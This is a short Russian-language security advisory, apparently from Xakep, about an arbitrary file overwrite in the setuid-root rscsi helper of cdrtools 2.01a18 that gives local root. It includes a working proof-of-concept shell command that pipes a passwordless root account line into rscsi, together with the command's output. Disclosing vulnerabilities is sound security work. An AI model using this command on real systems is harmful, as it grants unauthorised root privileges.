Хакер #305. Многошаговые SQL-инъекции
Уязвимость обнаружена в cdrtools в программе
rscsi. Локальный пользователь может получить
root привилегии.
Обнаруженная уязвимость в set user id (setuid) root
user вспомогательном приложении rscsi
позволяет локальному пользователю
перезаписывать произвольные файлы на
системе. Дополнительные подробности не
раскрываются.
Уязвимость обнаружена в Cdrtools 2.01a18.
Пример:
elguapo@gentoo elguapo $ echo C`echo -e "\x08\x08\x08\x08\x08\x08\x08\x08\x08\
x08r00t::0:0:root:/:/bin/bash\x0a"` | /opt/schily/sbin/rscsi /tmp/lala
Segmentation fault (this segfault is not related to the security issue)
elguapo@gentoo elguapo $ cat /tmp/lala
rscsid: user id 1000, name elguapo
rmt: stdin is a PIPE
r00t::0:0:root:/root:/bin/bash